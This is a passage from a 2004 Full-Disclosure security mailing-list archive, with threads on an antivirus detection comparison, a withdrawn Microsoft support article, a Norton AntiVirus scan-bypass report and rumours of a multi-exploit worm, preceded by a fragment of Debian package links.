http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4_all.deb
  Size/MD5 checksum:  1032600 c7ec4194385c7ee8601c7f4c87490d2f

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody4_mips.deb
  Size/MD5 c

Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread Daniel H. Renner 
On Fri, 2004-04-16 at 06:59, [EMAIL PROTECTED]
wrote:
> Reply-To: "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
> From: "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
> To: "bugtraq" <[EMAIL PROTECTED]>
> Date: Fri, 16 Apr 2004 13:47:59 +0200
> Subject: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results
> 
> Hi everyone!
> Just wanted to say to all of you that Mcafee(Pro 8) seems to be the best 
> antivirus around.
> Mcafee auto updates itself without asking(norton asks). And displays
> It is the only one(from norton 2004,panda and mcafee) who identifies the 
> following as viruses/backdoors:
> 
> 1. VBS/Inor.B
> 2. VBS/Psyme
> 3. Exploit -CodeBase.Gen
> 4. JS/Exploit-FileProxy
> 5. JV/ShinWow
> 6. X-Wreck(my own - unpublished backdoor - identified by the huristic 
> engine)
> 7. http://www.realtime-spy.com keylogger
> 8. Cain & Abel(which is a trijan) - as possibly evil tool
> 9. Nmap - as possibly evil tool
> 
> As the facts proove mcafee is the best for now, though i saw a research 
> claiming BitDefender
> as the best. BitDefender is great, but comparing it with mcafee is a little 
> hard task to do.
> 
> 
> Rafel Ivgi, The-Insider. 
> 

The test results (sponsored by "PC Utilities" mag) at this site agree
with most of your observations:
http://www.virus.gr/english/fullxml/default.asp?id=62&mnu=62
-- 


Cheers,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Re: "Delete anti-virus and firewall software" --Microsoft

2004-04-17 Thread Daniel H. Renner 
MS has not removed the page from their Japanese pages which can be found
here:
http://support.microsoft.com/default.aspx?scid=kb;ja;820673

Translation via Bablefish can be done with cut-paste of the article
itself here:
http://babelfish.altavista.com/
-- 


Cheers,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700


On Fri, 2004-04-16 at 15:13, [EMAIL PROTECTED]
wrote:
Date: Fri, 16 Apr 2004 16:08:25 -0500
From: hggdh <[EMAIL PROTECTED]>
Reply-To: hggdh <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: "Delete anti-virus and firewall software"
--Microsoft

F34E1119A12EE
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

Hello Kim,

Friday, April 16, 2004, 12:00:37 PM, you wrote:


KS> Isn't the "Resolution" in this Knowledge Base article a little, uh,
ill=
-advised:

KS> 

Alas, it seems Microsoft has been reading full-disclosure lately...
the page seems to have been taken off-line.
--=20

 ..hggdh..

F34E1119A12EE
Content-Type: application/pgp-signature

-BEGIN PGP MESSAGE-
Version: GnuPG v1.2.2 (MingW32)

iD8DBQFAgEtJVFMjkob7xf8RAh0UAJ4rXL+navoH2Jk4qsBTUdhy31/yTACgghBI
rKRVEgWlxGGitSQUfzD5kpQ=
=xWF1
-END PGP MESSAGE-

F34E1119A12EE--




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....[silent patch???]

2004-04-17 Thread bipin gautam 
tomchop
posting on bugtraq isn't a big deal. :? 
http://www.geocities.com/visitbipin/ <-c' that out!

btw: the bug has been fixed in the latest updates of
NAV 2002 [that was a silent patch!]


--- bipin gautam <[EMAIL PROTECTED]> wrote:
> Norton AntiVirus nested file manual scan bypass.
> 
> Product Version: Norton Antivirus 2002 (~Only tested
> On...~)
> Risk Impact: Medium
> 
--




__
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢
http://photos.yahoo.com/ph/print_splash

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Super Worm

2004-04-17 Thread lists 
The Internet Storm Center handler's diary talks about a super worm that 
might explot several of the issues address in Tuesday's patches from 
Microsoft.  I've also heard some rumblings like that but haven't be
able to confirm anything.  

Anyone else hearing this kind of info

Jason

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Super Worm

2004-04-17 Thread John Sage 
hmm..

On Sat, Apr 17, 2004 at 09:57:19PM -0500, [EMAIL PROTECTED] wrote:
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Super Worm
> Date: Sat, 17 Apr 2004 21:57:19 -0500 (CDT)
> 
> The Internet Storm Center handler's diary talks about a super worm
> that might explot several of the issues address in Tuesday's patches
> from Microsoft.  I've also heard some rumblings like that but
> haven't be able to confirm anything.

What it says is:

"Possible combined exploits of MS vulnerabilities"

"It has been a very quiet day, but we are hearing rumors of possible
'super' exploits that may target several of the vulnerabilities
announced by Microsoft on Tuesday. We've been contacted by an
individual who have have been infected such an exploit, but
investigation of this is still underway."


I'm not sure that "possible 'super' exploits" - plural - translates
literally into "super worm" - singular.

The only reason I bring this up is that within hours we'll probably be
seeing stories on news.google.com about "Experts say new Super Worm
threatens existence of Internet!"


- John
-- 
10 print "Home"
20 print "Sweet"
30 goto 10

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html